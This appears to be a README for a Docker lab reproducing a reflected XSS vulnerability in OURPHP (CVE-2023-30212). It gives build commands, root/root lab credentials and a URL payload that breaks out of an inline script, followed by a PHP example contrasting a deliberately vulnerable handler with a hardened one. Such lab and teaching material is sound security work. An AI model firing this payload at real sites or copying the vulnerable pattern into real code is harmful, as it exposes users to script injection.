VisDev23 / Vulnerable-Docker--CVE-2023-30212-

This contains the necessary files and Dockerfile to replicate an XSS vulnerability in OURPHP (CVE-2023-30212).

Vulnerable-Docker-CVE-2023-30212-

This contains the necessary directories and Dockerfile to replicate an XSS vulnerability in OURPHP (CVE-2023-30212).

Creating a Vulnerable Docker Environment (CVE-2023-30212)

PREREQUISITES

Install Docker: sudo apt install -y docker.io

Follow the commands below step by step:

Download the files from this repository using git clone: git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git .

This contains the necessary directories and Dockerfile to replicate the scenario.

After downloading the files, build a Docker image using: sudo docker build -t <Give_Suitable_Docker_name> . .

! Add a name to the Docker image so that it can be called later.

Start a container from the Docker image using: sudo docker run -d -p 80:80 <Docker_Image_Name> .

! Here host port 80 is mapped to container port 80.

To see the status of the Docker container, run: sudo docker ps

After doing these steps,

Open localhost in a browser and configure OURPHP with the following credentials:
Username: root
Password: root
Database Name: data

Now configure the username and password for the administrator account. Set the following and proceed:
Username: root
Password: root

So our payload is /client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>

Append this to localhost or 127.0.0.1 to trigger the XSS.
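
The leading </script> in the payload suggests the out parameter is reflected inside an inline script block, where the HTML parser ends the script element regardless of JavaScript quoting. The PHP below is an added example, not code from OURPHP or this repository: it contrasts that reflection pattern with a context-aware fix. The function names and the redirect template are hypothetical, since OURPHP's actual source is not shown here.

```php
<?php
// Added example: hypothetical handlers, NOT OURPHP's actual source.
// Assumption: 'out' is reflected into an inline <script> redirect.

// Vulnerable pattern: raw interpolation into a JavaScript string.
function render_vulnerable(string $out): string
{
    return "<script>location.href='" . $out . "';</script>";
}

// Escaping quotes alone does not help: the HTML parser ends the script
// element at the first "</script>", before any JavaScript is parsed.
function render_quotes_only(string $out): string
{
    return "<script>location.href='" . addslashes($out) . "';</script>";
}

// Emit a JS string literal with <, >, &, ' and " written as \uXXXX,
// so the value can never contain "</script>" or close the string.
function encode_for_script(string $value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return json_encode($value, $flags | JSON_THROW_ON_ERROR);
}

// Hardened: accept only a same-site path (this also blocks javascript:
// URLs and off-site redirects), then encode for the script context.
function render_hardened(string $out): string
{
    if (!preg_match('#\A/(?!/)[A-Za-z0-9_./-]*\z#', $out)) {
        $out = '/'; // fall back to a fixed local target
    }
    return '<script>location.href=' . encode_for_script($out) . ';</script>';
}

// Number of script elements the markup opens; the page intends exactly 1.
function script_open_count(string $html): int
{
    return substr_count(strtolower($html), '<script');
}

$payload = '</script><script>alert("xss")</script>'; // from the README above
foreach (['render_vulnerable', 'render_quotes_only', 'render_hardened'] as $fn) {
    printf("%-20s opens %d script element(s)\n", $fn, script_open_count($fn($payload)));
}
echo encode_for_script($payload), "\n"; // encoder output for the raw payload
```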
